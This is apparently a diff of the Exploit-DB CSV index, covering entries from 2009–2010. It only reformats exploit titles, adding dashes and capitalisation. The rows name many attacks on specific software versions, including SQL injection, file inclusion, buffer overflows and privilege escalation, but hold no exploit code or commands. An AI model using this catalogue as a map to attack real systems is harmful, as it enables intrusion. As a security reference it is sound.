9886,platforms/windows/remote/9886.txt,"httpdx 1.4 - h_handlepeer BoF",2009-10-16,"Pankaj Kohli, Trancer",windows,remote,0 9887,platforms/jsp/webapps/9887.txt,"jetty 6.x - 7.x - xss, information disclosure, injection",2009-10-26,"Antonion Parata",jsp,webapps,0 -9888,platforms/php/webapps/9888.txt,"Joomla Ajax Chat 1.0 remote file inclusion",2009-10-19,kaMtiEz,php,webapps,0 +9888,platforms/php/webapps/9888.txt,"Joomla Ajax Chat 1.0 - Remote File Inclusion",2009-10-19,kaMtiEz,php,webapps,0 9889,platforms/php/webapps/9889.txt,"Joomla Book Library 1.0 file inclusion",2009-10-19,kaMtiEz,php,webapps,0 9890,platforms/php/webapps/9890.txt,"Joomla JD-WordPress 2.0 RC2 - Remote file icnlusion",2009-10-19,"Don Tukulesto",php,webapps,0 9891,platforms/php/webapps/9891.txt,"Joomla Jshop SQL Injection",2009-10-23,"Don Tukulesto",php,webapps,0 @@ -9340,7 +9340,7 @@ id,file,description,date,author,platform,type,port 9963,platforms/asp/webapps/9963.txt,"QuickTeam 2.2 - SQL Injection",2009-10-14,"drunken danish rednecks",asp,webapps,0 9964,platforms/php/webapps/9964.txt,"RunCMS 2m1 store() SQL injection",2009-10-26,bookoo,php,webapps,0 9965,platforms/php/webapps/9965.txt,"RunCMS 2ma post.php SQL injection",2009-10-26,bookoo,php,webapps,0 -9966,platforms/windows/remote/9966.txt,"Serv-u Web client 9.0.0.5 Buffer Overflow",2009-11-02,"Nikolas Rangos",windows,remote,80 +9966,platforms/windows/remote/9966.txt,"Serv-u Web client 9.0.0.5 - Buffer Overflow",2009-11-02,"Nikolas Rangos",windows,remote,80 9967,platforms/asp/webapps/9967.txt,"SharePoint 2007 Team Services source code disclosure",2009-10-26,"Daniel Martin",asp,webapps,0 9969,platforms/multiple/dos/9969.txt,"Snort <= 2.8.5 - IPv6 DoS",2009-10-23,"laurent gaffie",multiple,dos,0 9970,platforms/windows/local/9970.txt,"South River Technologies WebDrive 9.02 build 2232 - Privilege Escalation",2009-10-20,"bellick ",windows,local,0 @@ -9359,7 +9359,7 @@ id,file,description,date,author,platform,type,port 9988,platforms/windows/local/9988.txt,"Adobe Photoshop Elements - Active File Monitor Service Local Privilege Escalation",2009-10-29,"bellick ",windows,local,0 9990,platforms/multiple/local/9990.txt,"Adobe Reader and Acrobat U3D File Invalid Array Index Remote Vulnerability",2009-11-09,"Felipe Andres Manzano",multiple,local,0 9991,platforms/windows/local/9991.txt,"AlleyCode 2.21 SEH Overflow PoC",2009-10-05,"Rafael Sousa",windows,local,0 -9992,platforms/windows/remote/9992.txt,"AOL 9.1 SuperBuddy ActiveX Control remote code execution",2009-10-01,Trotzkista,windows,remote,0 +9992,platforms/windows/remote/9992.txt,"AOL 9.1 SuperBuddy ActiveX Control Remote code execution",2009-10-01,Trotzkista,windows,remote,0 9993,platforms/multiple/remote/9993.txt,"Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross-Site Scripting Vulnerability",2009-11-09,"Richard H. Brain",multiple,remote,0 9994,platforms/multiple/remote/9994.txt,"Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability",2009-11-09,"John Kew",multiple,remote,0 9995,platforms/multiple/remote/9995.txt,"Apache Tomcat Form Authentication Username Enumeration Weakness",2009-11-09,"D. Matscheko",multiple,remote,0 @@ -9439,7 +9439,7 @@ id,file,description,date,author,platform,type,port 10076,platforms/osx/local/10076.c,"VMWare Fusion <= 2.0.5 vmx86 kext Local kernel Root Exploit",2009-10-02,mu-b,osx,local,0 10077,platforms/multiple/dos/10077.txt,"OpenLDAP 2.3.39 MODRDN Remote Denial of Service Vulnerability",2009-11-09,"Ralf Haferkamp",multiple,dos,389 10078,platforms/osx/local/10078.c,"VMWare Fusion <= 2.0.5 vmx86 kext Local PoC",2009-10-02,mu-b,osx,local,0 -10079,platforms/windows/remote/10079.txt,"Google Apps mailto uri handler cross-browser remote command execution",2009-10-01,pyrokinesis,windows,remote,0 +10079,platforms/windows/remote/10079.txt,"Google Apps mailto uri handler cross-browser Remote command execution",2009-10-01,pyrokinesis,windows,remote,0 10081,platforms/hardware/remote/10081.txt,"Palm Pre WebOS <= 1.1 - Remote File Access Vulnerability",2009-10-05,"Townsend Ladd Harris",hardware,remote,0 10082,platforms/php/webapps/10082.txt,"PBBoard <= 2.0.2 - Full Path Disclosure",2009-10-06,rUnViRuS,php,webapps,0 10083,platforms/php/remote/10083.txt,"PHP <=5.3 - preg_match() full path disclosure",2009-09-27,"David Vieira-Kurz",php,remote,0 @@ -9467,7 +9467,7 @@ id,file,description,date,author,platform,type,port 10105,platforms/php/webapps/10105.txt,"Cifshanghai (chanpin_info.php) CMS SQL Injection",2009-11-16,ProF.Code,php,webapps,0 10106,platforms/windows/dos/10106.c,"Avast 4.8.1351.0 antivirus aswMon2.sys Kernel Memory Corruption",2009-11-17,Giuseppe,windows,dos,0 10107,platforms/windows/local/10107.pl,"Icarus 2.0 - (.pgn) Universal Local Buffer Overflow Exploit (SEH)",2009-11-17,"D3V!L FUCK3R",windows,local,0 -10160,platforms/windows/dos/10160.py,"FtpXQ authenticated remote DoS",2009-11-17,"Marc Doudiet",windows,dos,21 +10160,platforms/windows/dos/10160.py,"FtpXQ authenticated Remote DoS",2009-11-17,"Marc Doudiet",windows,dos,21 10161,platforms/asp/webapps/10161.txt,"JBS 2.0 / JBSX - Administration panel Bypass and File Upload Vulnerability",2009-11-17,blackenedsecurity,asp,webapps,0 10162,platforms/windows/remote/10162.py,"Home FTP Server 'MKD' Command Directory Traversal Vulnerability",2009-11-17,zhangmc,windows,remote,21 10163,platforms/windows/dos/10163.pl,"Novell eDirectory HTTPSTK Login Stack Overflow Vulnerability",2009-11-17,karak0rsan,windows,dos,80 @@ -9575,7 +9575,7 @@ id,file,description,date,author,platform,type,port 10288,platforms/php/webapps/10288.txt,"SAPID SHOP <= 1.3 - Remote File Include Vulnerability",2009-12-03,"cr4wl3r ",php,webapps,0 10289,platforms/php/webapps/10289.txt,"Power BB 1.8.3 - Remote File Includes",2009-11-25,DigitALL,php,webapps,0 10290,platforms/php/webapps/10290.txt,"Theeta CMS - Multiple Vulnerabilities",2009-12-03,c0dy,php,webapps,0 -10291,platforms/php/webapps/10291.txt,"Joomla! ProofReader Component 1.0 RC6 Cross-Site Scripting Vulnerability",2009-12-01,MustLive,php,webapps,0 +10291,platforms/php/webapps/10291.txt,"Joomla! ProofReader Component 1.0 RC6 - Cross-Site Scripting Vulnerability",2009-12-01,MustLive,php,webapps,0 10292,platforms/multiple/webapps/10292.txt,"Apache Tomcat 3.2.1 - 404 Error Page Cross-Site Scripting Vulnerability",2009-12-01,MustLive,multiple,webapps,0 10293,platforms/php/webapps/10293.txt,"PHP-Nuke <= 8.0 - XSS & HTML Code Injection in News Module",2009-11-27,K053,php,webapps,0 10294,platforms/php/webapps/10294.txt,"OSI Codes PHP Live! Support 3.1 - Remote File Inclusion Vulnerability",2009-11-24,"Don Tukulesto",php,webapps,0 @@ -9585,7 +9585,7 @@ id,file,description,date,author,platform,type,port 10298,platforms/windows/local/10298.c,"Jasc Paint Shop Pro 8 - Local Buffer Overflow Exploit (UNIVERSAL)",2009-12-04,"fl0 fl0w",windows,local,0 10299,platforms/php/webapps/10299.txt,"GeN3 forum 1.3 - SQL Injection Vulnerability",2009-12-04,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10302,platforms/php/webapps/10302.txt,"427BB Fourtwosevenbb <= 2.3.2 - SQL Injection Exploit",2009-12-04,"cr4wl3r ",php,webapps,0 -10303,platforms/windows/dos/10303.py,"Core FTP Server 1.0 Build 319 Denial of Service",2009-12-04,"Mert SARICA",windows,dos,0 +10303,platforms/windows/dos/10303.py,"Core FTP Server 1.0 Build 319 - Denial of Service",2009-12-04,"Mert SARICA",windows,dos,0 10304,platforms/php/webapps/10304.txt,"Invision Power Board <= 3.0.4 - LFI and <= 3.0.4 and <= 2.3.6 - SQL Injection",2009-12-04,"Dawid Golunski",php,webapps,0 10305,platforms/php/webapps/10305.txt,"UBB.threads 7.5.4 2 - Multiple File Inclusion Vulnerabilities",2009-12-04,R3VAN_BASTARD,php,webapps,0 10306,platforms/php/webapps/10306.txt,"Achievo 1.4.2 - Arbitrary File Upload",2009-12-04,"Nahuel Grisolia",php,webapps,0 @@ -9615,7 +9615,7 @@ id,file,description,date,author,platform,type,port 10339,platforms/windows/local/10339.pl,"gAlan 0.2.1 - Buffer Overflow Exploit (0day)",2009-12-07,"Jeremy Brown",windows,local,0 10340,platforms/windows/remote/10340.pl,"Multiple Symantec Products Intel Common Base Agent Remote Command Execution",2009-04-28,kingcope,windows,remote,0 10341,platforms/php/webapps/10341.txt,"SiSplet CMS <= 2008-01-24 - Multiple Remote File Include Exploit",2009-12-07,"cr4wl3r ",php,webapps,0 -10343,platforms/windows/dos/10343.txt,"Kingsoft Internet Security 9 Denial of Services",2009-11-05,"Francis Provencher",windows,dos,0 +10343,platforms/windows/dos/10343.txt,"Kingsoft Internet Security 9 - Denial of Services",2009-11-05,"Francis Provencher",windows,dos,0 10344,platforms/windows/local/10344.rb,"Adobe Illustrator CS4 14.0.0 - eps Universal Buffer Overflow (meta)",2009-12-07,dookie,windows,local,0 10345,platforms/windows/local/10345.py,"gAlan - (.galan ) Universal Buffer Overflow Exploit",2009-12-07,Dz_attacker,windows,local,0 10346,platforms/windows/local/10346.rb,"gAlan 0.2.1 - Universal Buffer Overflow Exploit (meta)",2009-12-07,loneferret,windows,local,0 @@ -10062,7 +10062,7 @@ id,file,description,date,author,platform,type,port 10903,platforms/asp/webapps/10903.txt,"Mini-NUKE 2.3 - Freehost Multiple Vulnerabilities",2010-01-01,LionTurk,asp,webapps,0 10904,platforms/windows/dos/10904.pl,"Switch Sound File Converter .mpga BoF DoS",2010-01-01,jacky,windows,dos,0 10905,platforms/php/webapps/10905.txt,"Joomla Component com_avosbillets Blind SQL Injection Vulnerability",2010-01-01,Pyske,php,webapps,0 -10906,platforms/php/webapps/10906.txt,"DZOIC ClipHouse suffer from auth bypass remote SQL Injection",2010-01-02,R3d-D3V!L,php,webapps,0 +10906,platforms/php/webapps/10906.txt,"DZOIC ClipHouse suffer from auth bypass Remote SQL Injection",2010-01-02,R3d-D3V!L,php,webapps,0 10907,platforms/windows/dos/10907.pl,"VSO Medoa Player 1.0.2.2 - Local Denial of Services PoC",2010-01-02,SarBoT511,windows,dos,0 10908,platforms/windows/dos/10908.pl,"GOM player 2.1.9 - Local Crash PoC",2010-01-02,SarBoT511,windows,dos,0 10909,platforms/windows/dos/10909.pl,"MP4 Player 4.0 - Local Crash PoC",2010-01-02,SarBoT511,windows,dos,0 @@ -10195,7 +10195,7 @@ id,file,description,date,author,platform,type,port 11109,platforms/windows/local/11109.rb,"Audiotran 1.4.1 (PLS File) Stack Overflow (meta)",2010-01-11,dookie,windows,local,0 11110,platforms/php/webapps/11110.txt,"Image Hosting Script Remote shell upload Vulnerability",2010-01-11,R3d-D3V!L,php,webapps,0 11111,platforms/php/webapps/11111.txt,"FAQEngine 4.24.00 - Remote File Inclusion Vulnerability",2010-01-11,kaMtiEz,php,webapps,0 -11112,platforms/windows/local/11112.c,"HTMLDOC 1.9.x-r1629 - Local .html Buffer Overflow (win32) Exploit",2010-01-11,"fl0 fl0w",windows,local,0 +11112,platforms/windows/local/11112.c,"HTMLDOC 1.9.x-r1629 - Local .html Buffer Overflow (Win32) Exploit",2010-01-11,"fl0 fl0w",windows,local,0 11113,platforms/php/webapps/11113.txt,"tincan ltd (section) SQL Injection Vulnerability",2010-01-11,"ALTBTA ",php,webapps,0 11116,platforms/php/webapps/11116.html,"Alwjeez Script Database Backup Exploit",2010-01-11,alnjm33,php,webapps,0 11117,platforms/ios/dos/11117.py,"iOS Udisk FTP Basic Edition - Remote DoS Exploit (0day)",2010-01-12,mr_me,ios,dos,8080 @@ -10230,7 +10230,7 @@ id,file,description,date,author,platform,type,port 11157,platforms/php/webapps/11157.txt,"MoME CMS <= 0.8.5 - Remote Login Bypass Exploit",2010-01-16,"cr4wl3r ",php,webapps,0 11158,platforms/php/webapps/11158.txt,"RoseOnlineCMS <= 3 B1 - Remote Login Bypass Exploit",2010-01-16,"cr4wl3r ",php,webapps,0 11159,platforms/php/webapps/11159.txt,"DasForum (layout) Local File Inclusion Exploit",2010-01-16,"cr4wl3r ",php,webapps,0 -11161,platforms/windows/local/11161.pl,"Rosoft Media Player 4.4.4 Buffer OverFlow Exploit (SEH)",2010-01-16,Red-D3v1L,windows,local,0 +11161,platforms/windows/local/11161.pl,"Rosoft Media Player 4.4.4 - Buffer OverFlow Exploit (SEH)",2010-01-16,Red-D3v1L,windows,local,0 11162,platforms/php/webapps/11162.txt,"CLONEBID B2B Marketplace Multiple Vulnerabilities",2010-01-16,"Hamza 'MizoZ' N.",php,webapps,0 11163,platforms/php/webapps/11163.txt,"ITechSctipts Alibaba Clone Multiple Vulnerabilities",2010-01-16,"Hamza 'MizoZ' N.",php,webapps,0 11164,platforms/php/webapps/11164.txt,"Ebay Clone from clone2009 SQL Injection Vulnerabilities",2010-01-16,"Hamza 'MizoZ' N.",php,webapps,0 @@ -10242,7 +10242,7 @@ id,file,description,date,author,platform,type,port 11171,platforms/windows/local/11171.pl,"Audiotran 1.4.1 - Direct RET BoF",2010-01-17,jacky,windows,local,0 11172,platforms/windows/remote/11172.html,"Adobe GetPlus get_atlcom 1.6.2.48 - ActiveX Remote Exec PoC (0day)",2010-01-17,superli,windows,remote,0 11173,platforms/windows/remote/11173.txt,"TrendMicro Web-Deployment ActiveX - Remote Exec PoC (0day)",2010-01-17,superli,windows,remote,0 -11174,platforms/windows/local/11174.c,"VLC 0.8.6 [b][c][d][a] - (.ASS) Buffer Overflow Exploit(win32 universal)",2010-01-17,"fl0 fl0w",windows,local,0 +11174,platforms/windows/local/11174.c,"VLC 0.8.6 [b][c][d][a] - (.ASS) Buffer Overflow Exploit(Win32 universal)",2010-01-17,"fl0 fl0w",windows,local,0 11176,platforms/windows/dos/11176.txt,"Xunlei XPPlayer <= 5.9.14.1246 - ActiveX Remote Exec PoC (0day)",2010-01-17,superli,windows,dos,0 11177,platforms/php/webapps/11177.txt,"Joomla Component com_prime Directory Traversal",2010-01-17,FL0RiX,php,webapps,0 11178,platforms/php/webapps/11178.txt,"Joomla Component com_libros SQL Injection Vulnerability",2010-01-17,FL0RiX,php,webapps,0 @@ -10275,7 +10275,7 @@ id,file,description,date,author,platform,type,port 11212,platforms/asp/webapps/11212.txt,"eWebeditor Directory Traversal",2010-01-21,N/A,asp,webapps,0 11213,platforms/php/webapps/11213.txt,"Joomla Component com_book SQL Injection Vulnerability",2010-01-21,Evil-Cod3r,php,webapps,0 11214,platforms/windows/dos/11214.html,"Windows Live Messenger 2009 ActiveX Heap Overflow PoC",2010-01-21,SarBoT511,windows,dos,0 -11215,platforms/windows/webapps/11215.txt,"SHOUTcast Server <= 1.9.8/win32 - CSRF Vulnerability",2010-01-21,"cp77fk4r ",windows,webapps,0 +11215,platforms/windows/webapps/11215.txt,"SHOUTcast Server <= 1.9.8/Win32 - CSRF Vulnerability",2010-01-21,"cp77fk4r ",windows,webapps,0 11216,platforms/php/webapps/11216.txt,"Blog System 1.x - (note) SQL Injection Vuln",2010-01-21,"BorN To K!LL",php,webapps,0 11217,platforms/windows/dos/11217.txt,"IntelliTamper 2.07/2.08 (defer)Remote Buffer Overflow PoC",2010-01-21,SkuLL-HackeR,windows,dos,0 11218,platforms/multiple/webapps/11218.txt,"jQuery uploadify 2.1.0 - Remote File Upload",2010-01-21,k4cp3r/Ablus,multiple,webapps,0 @@ -10312,7 +10312,7 @@ id,file,description,date,author,platform,type,port 11260,platforms/windows/dos/11260.txt,"AIC Audio Player 1.4.1.587 - Local Crash PoC",2010-01-26,b0telh0,windows,dos,0 11261,platforms/php/webapps/11261.txt,"UGiA PHP UPLOADER 0.2 - Shell Upload Vulnerability",2010-01-26,indoushka,php,webapps,0 11262,platforms/php/webapps/11262.php,"Joomla 1.5.12 connect back Exploit",2010-01-26,"Nikola Petrov",php,webapps,0 -11263,platforms/php/webapps/11263.php,"Joomla 1.5.12 read/exec remote files",2010-01-26,"Nikoal Petrov",php,webapps,0 +11263,platforms/php/webapps/11263.php,"Joomla 1.5.12 read/exec Remote files",2010-01-26,"Nikoal Petrov",php,webapps,0 11264,platforms/windows/local/11264.txt,"South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation",2010-01-26,Trancer,windows,local,0 11265,platforms/windows/dos/11265.pl,"KOL WaveIOX 1.04 - (.wav) Local Buffer Overflow PoC",2010-01-26,"cr4wl3r ",windows,dos,0 11266,platforms/windows/dos/11266.pl,"KOL Wave Player 1.0 - (.wav) Local Buffer Overflow PoC",2010-01-26,"cr4wl3r ",windows,dos,0 @@ -10861,7 +10861,7 @@ id,file,description,date,author,platform,type,port 11900,platforms/windows/local/11900.pl,"Mini-stream RM-MP3 Converter 3.0.0.7 - (.pls) Universal Stack BoF",2010-03-27,mat,windows,local,0 11902,platforms/php/webapps/11902.txt,"MyOWNspace 8.2 - Multi Local File Include",2010-03-27,ITSecTeam,php,webapps,0 11903,platforms/php/webapps/11903.txt,"Open Web Analytics 1.2.3 multi file include",2010-03-27,ITSecTeam,php,webapps,0 -11904,platforms/php/webapps/11904.txt,"68kb multi remote file include",2010-03-27,ITSecTeam,php,webapps,0 +11904,platforms/php/webapps/11904.txt,"68kb multi Remote file include",2010-03-27,ITSecTeam,php,webapps,0 11905,platforms/php/webapps/11905.txt,"Simple Machines Forum (SMF) <= 1.1.8 - (avatar) Remote PHP File Execute PoC",2010-03-27,JosS,php,webapps,0 11906,platforms/php/webapps/11906.txt,"Uebimiau Webmail <= 2.7.2 - Multiple Vulnerabilities.",2010-03-27,"cp77fk4r ",php,webapps,0 11908,platforms/php/webapps/11908.txt,"Joomla Component com_solution SQL Injection Vulnerability",2010-03-27,"DevilZ TM",php,webapps,0 @@ -11011,7 +11011,7 @@ id,file,description,date,author,platform,type,port 12077,platforms/php/webapps/12077.txt,"Joomla Component News Portal com_news Local File Inclusion Vulnerability",2010-04-06,AntiSecurity,php,webapps,0 12078,platforms/php/webapps/12078.txt,"Joomla Freestyle FAQ Lite Component 1.3 com_fss (faqid) SQL Injection",2010-04-06,"Chip d3 bi0s",php,webapps,0 12079,platforms/windows/dos/12079.pl,"Microsoft Office (2010 beta) Communicator SIP Denial of Service Exploit",2010-04-06,indoushka,windows,dos,0 -12080,platforms/windows/dos/12080.txt,"Foxit Reader <= 3.2.1.0401 Denial of Service Exploit",2010-04-06,juza,windows,dos,0 +12080,platforms/windows/dos/12080.txt,"Foxit Reader <= 3.2.1.0401 - Denial of Service Exploit",2010-04-06,juza,windows,dos,0 12081,platforms/windows/dos/12081.php,"Jzip 1.3 - (.zip) Unicode Buffer Overflow PoC (0day)",2010-04-06,mr_me,windows,dos,0 12082,platforms/php/webapps/12082.txt,"Joomla Component Saber Cart com_sebercart Local File Inclusion Vulnerability",2010-04-06,AntiSecurity,php,webapps,0 12083,platforms/php/webapps/12083.txt,"Joomla Component J!WHMCS Integrator com_jwhmcs Local File Inclusion Vulnerability",2010-04-06,AntiSecurity,php,webapps,0 @@ -11242,8 +11242,8 @@ id,file,description,date,author,platform,type,port 12332,platforms/windows/remote/12332.pl,"Xftp client 3.0 PWD Remote Exploit",2010-04-22,zombiefx,windows,remote,0 12333,platforms/php/webapps/12333.txt,"cms - (id) 5.0 - SQL Injection Vulnerability",2010-04-22,spykit,php,webapps,0 12334,platforms/linux/dos/12334.c,"OpenSSL - Remote DoS",2010-04-22,Andi,linux,dos,0 -12336,platforms/windows/dos/12336.c,"Windows 2000/XP/2003 win32k.sys SfnLOGONNOTIFY Local kernel Denial of Service Vulnerability",2010-04-22,MJ0011,windows,dos,0 -12337,platforms/windows/dos/12337.c,"Windows 2000/XP/2003 win32k.sys SfnINSTRING Local kernel Denial of Service Vulnerability",2010-04-22,MJ0011,windows,dos,0 +12336,platforms/windows/dos/12336.c,"Windows 2000/XP/2003 Win32k.sys SfnLOGONNOTIFY Local kernel Denial of Service Vulnerability",2010-04-22,MJ0011,windows,dos,0 +12337,platforms/windows/dos/12337.c,"Windows 2000/XP/2003 Win32k.sys SfnINSTRING Local kernel Denial of Service Vulnerability",2010-04-22,MJ0011,windows,dos,0 12338,platforms/php/webapps/12338.txt,"Cacti <= 0.8.7e - SQL Injection",2010-04-22,"Nahuel Grisolia",php,webapps,0 12339,platforms/php/webapps/12339.txt,"Cacti <= 0.8.7e - OS Command Injection",2010-04-22,"Nahuel Grisolia",php,webapps,0 12340,platforms/php/webapps/12340.txt,"Joomla Component com_caddy - Vulnerability",2010-04-22,_SuBz3r0_,php,webapps,0 @@ -12141,7 +12141,7 @@ id,file,description,date,author,platform,type,port 13833,platforms/php/webapps/13833.txt,"Parallels System Automation (PSA) Local File Inclusion Vulnerability",2010-06-11,"Pouya Daneshmand",php,webapps,0 13834,platforms/windows/remote/13834.html,"Sygate Personal Firewall 5.6 build 2808 ActiveX with DEP bypass",2010-06-11,Lincoln,windows,remote,0 13835,platforms/php/webapps/13835.txt,"DaLogin 2.2 (FCKeditor) Remote Arbitrary File Upload Exploit",2010-06-11,eidelweiss,php,webapps,0 -13836,platforms/windows/dos/13836.py,"Solarwinds 10.4.0.13 Denial of Service Exploit",2010-06-12,Nullthreat,windows,dos,0 +13836,platforms/windows/dos/13836.py,"Solarwinds 10.4.0.13 - Denial of Service Exploit",2010-06-12,Nullthreat,windows,dos,0 13837,platforms/windows/dos/13837.pl,"Media Player Classic 1.3.1774.0 - (mpcpl) Local DoS (PoC) (0day)",2010-06-12,R3d-D3V!L,windows,dos,0 13838,platforms/windows/dos/13838.pl,"CP3 Studio PC Version - Denial of Service",2010-06-12,chap0,windows,dos,0 13840,platforms/asp/webapps/13840.txt,"VU Case Manager Authentication Bypass",2010-06-12,"L0rd CrusAd3r",asp,webapps,0 @@ -12183,7 +12183,7 @@ id,file,description,date,author,platform,type,port 13884,platforms/asp/webapps/13884.txt,"Restaurant Listing with Online Ordering SQL Injection Vulnerability",2010-06-15,"L0rd CrusAd3r",asp,webapps,0 13885,platforms/asp/webapps/13885.txt,"Acuity CMS 2.7.1 - SQL Injection Vulnerability",2010-06-15,"L0rd CrusAd3r",asp,webapps,0 13886,platforms/asp/webapps/13886.txt,"IISWorks FileMan fileman.mdb Remote User Database Disclosure",2010-06-15,j0fer,asp,webapps,0 -13887,platforms/windows/dos/13887.c,"Winplot 2010 Buffer Overflow PoC",2010-06-15,"fl0 fl0w",windows,dos,0 +13887,platforms/windows/dos/13887.c,"Winplot 2010 - Buffer Overflow PoC",2010-06-15,"fl0 fl0w",windows,dos,0 13888,platforms/windows/dos/13888.c,"SasCam 2.6.5 - Remote HTTP Server Crash",2010-06-15,"fl0 fl0w",windows,dos,0 13889,platforms/php/webapps/13889.txt,"Nakid CMS 0.5.2 - Remote File Inclusion Exploit",2010-06-16,sh00t0ut,php,webapps,0 13890,platforms/php/webapps/13890.txt,"EZPX Photoblog 1.2 beta Remote File Inclusion Exploit",2010-06-16,sh00t0ut,php,webapps,0 @@ -12218,7 +12218,7 @@ id,file,description,date,author,platform,type,port 13923,platforms/php/webapps/13923.txt,"Joomla Component Answers 2.3beta - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0 13925,platforms/php/webapps/13925.txt,"joomla component ozio gallery 2 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0 13926,platforms/php/webapps/13926.txt,"joomla component listbingo 1.3 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0 -13927,platforms/php/webapps/13927.txt,"MarketSaz remote file Upload Vulnerability",2010-06-18,NetQurd,php,webapps,0 +13927,platforms/php/webapps/13927.txt,"MarketSaz Remote file Upload Vulnerability",2010-06-18,NetQurd,php,webapps,0 13929,platforms/php/webapps/13929.txt,"Banner Management Script SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0 13930,platforms/php/webapps/13930.txt,"Shopping Cart Script with Affiliate Program SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0 13931,platforms/php/webapps/13931.txt,"Kubelance SQL Injection (profile.php?id)",2010-06-18,"L0rd CrusAd3r",php,webapps,0 @@ -12573,7 +12573,7 @@ id,file,description,date,author,platform,type,port 14362,platforms/php/webapps/14362.txt,"CMSQLite - SQL Injection Vulnerability",2010-07-14,"High-Tech Bridge SA",php,webapps,0 14363,platforms/php/webapps/14363.txt,"Ad Network Script Persistent XSS Vulnerability",2010-07-14,Sid3^effects,php,webapps,0 14364,platforms/php/webapps/14364.html,"eXtreme Message Board 1.9.11 - Multiple CSRF Vulnerabilities",2010-07-15,10n1z3d,php,webapps,0 -14365,platforms/php/webapps/14365.txt,"Campsite CMS remote Persistent XSS Vulnerability",2010-07-15,D4rk357,php,webapps,0 +14365,platforms/php/webapps/14365.txt,"Campsite CMS Remote Persistent XSS Vulnerability",2010-07-15,D4rk357,php,webapps,0 14366,platforms/php/webapps/14366.txt,"Whizzy CMS <= 10.01 - Local File Inclusion Vulnerability",2010-07-15,"Anarchy Angel",php,webapps,0 14367,platforms/multiple/dos/14367.txt,"Novell Groupwise Webaccess Stack Overflow",2010-07-15,"Francis Provencher",multiple,dos,0 14368,platforms/php/webapps/14368.txt,"RedShop 1.0.23.1 Joomla Component Blind SQL Injection Vulnerability",2010-07-15,"Salvatore Fresta",php,webapps,0 @@ -12688,12 +12688,12 @@ id,file,description,date,author,platform,type,port 14494,platforms/php/webapps/14494.txt,"AV Arcade 3 - Cookie SQL Injection Authentication Bypass",2010-07-28,saudi0hacker,php,webapps,0 14495,platforms/php/webapps/14495.txt,"Joomla Component PhotoMap Gallery 1.6.0 - Multiple Blind SQL Injection",2010-07-28,"Salvatore Fresta",php,webapps,0 14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - HTTP Remote Buffer Overflow (Post Auth)",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0 -14497,platforms/windows/local/14497.py,"WM Downloader 3.1.2.2 2010.04.15 Buffer Overflow (SEH)",2010-07-28,fdisk,windows,local,0 +14497,platforms/windows/local/14497.py,"WM Downloader 3.1.2.2 2010.04.15 - Buffer Overflow (SEH)",2010-07-28,fdisk,windows,local,0 14499,platforms/php/webapps/14499.txt,"Joomla Component PBBooking 1.0.4_3 - Multiple Blind SQL Injection",2010-07-29,"Salvatore Fresta",php,webapps,0 14500,platforms/php/webapps/14500.txt,"Whizzy CMS 10.02 - Local File Inclusion",2010-07-29,"Anarchy Angel",php,webapps,0 14501,platforms/php/webapps/14501.txt,"Joomla SimpleShop Component (com_simpleshop) SQL Injection Vulnerability",2010-07-29,"UnD3rGr0unD W4rri0rZ",php,webapps,0 14502,platforms/php/webapps/14502.txt,"Joomla Component (com_beamospetition) SQL Injection Vulnerability",2010-07-29,Forza-Dz,php,webapps,0 -14503,platforms/windows/local/14503.pl,"HTML Email Creator 2.42 build 718 Buffer Overflow Exploit (SEH)",2010-07-29,Madjix,windows,local,0 +14503,platforms/windows/local/14503.pl,"HTML Email Creator 2.42 build 718 - Buffer Overflow Exploit (SEH)",2010-07-29,Madjix,windows,local,0 14504,platforms/windows/dos/14504.html,"BarCodeWiz BarCode ActiveX 3.29 PoC",2010-07-30,loneferret,windows,dos,0 14505,platforms/windows/remote/14505.html,"BarCodeWiz Barcode ActiveX Control 3.29 BoF Exploit (SEH)",2010-07-30,loneferret,windows,remote,0 14511,platforms/windows/dos/14511.pl,"ChordPulse 1.4 - Denial of Service Vulnerability",2010-07-30,Madjix,windows,dos,0 @@ -12735,7 +12735,7 @@ id,file,description,date,author,platform,type,port 14563,platforms/php/webapps/14563.html,"BXR 0.6.8 - CSRF Vulnerability",2010-08-05,"High-Tech Bridge SA",php,webapps,0 14564,platforms/php/webapps/14564.html,"Amethyst 0.1.5 - XSS Vulnerability",2010-08-05,"High-Tech Bridge SA",php,webapps,0 14565,platforms/php/webapps/14565.html,"DiamondList 0.1.6 - Cross-Site Request Forgery Vulnerability",2010-08-05,"High-Tech Bridge SA",php,webapps,0 -14566,platforms/windows/local/14566.c,"Microsoft Windows - win32k.sys Driver ""CreateDIBPalette()"" Buffer Overflow",2010-08-06,Arkon,windows,local,0 +14566,platforms/windows/local/14566.c,"Microsoft Windows - Win32k.sys Driver ""CreateDIBPalette()"" Buffer Overflow",2010-08-06,Arkon,windows,local,0 14569,platforms/php/webapps/14569.txt,"joomla component cgtestimonial 2.2 - Multiple Vulnerabilities",2010-08-06,"Salvatore Fresta",php,webapps,0 14570,platforms/php/webapps/14570.txt,"Joomla Component com_neorecruit 1.4 - SQL Injection Vulnerability",2010-08-07,v3n0m,php,webapps,0 14572,platforms/php/webapps/14572.txt,"Tycoon CMS Record Script 1.0.9 - SQL Injection Vulnerability",2010-08-07,Silic0n,php,webapps,0 @@ -12770,14 +12770,14 @@ id,file,description,date,author,platform,type,port 14609,platforms/windows/dos/14609.py,"Msxml2.XMLHTTP.3.0 Response Handling Memory Corruption (MS10-051)",2010-08-10,Skylined,windows,dos,0 14610,platforms/windows/local/14610.txt,"Microsoft Windows Tracing Registry Key ACL Privilege Escalation Vulnerability",2010-08-10,"Cesar Cerrudo",windows,local,0 14611,platforms/windows/dos/14611.c,"Microsoft Windows - 'SfnLOGONNOTIFY' Local Privilege Escalation Vulnerability (MS10-048)",2010-08-10,MJ0011,windows,dos,0 -14612,platforms/windows/local/14612.py,"Mediacoder 0.7.5.4710 Buffer Overflow Exploit",2010-08-11,anonymous,windows,local,0 +14612,platforms/windows/local/14612.py,"Mediacoder 0.7.5.4710 - Buffer Overflow Exploit",2010-08-11,anonymous,windows,local,0 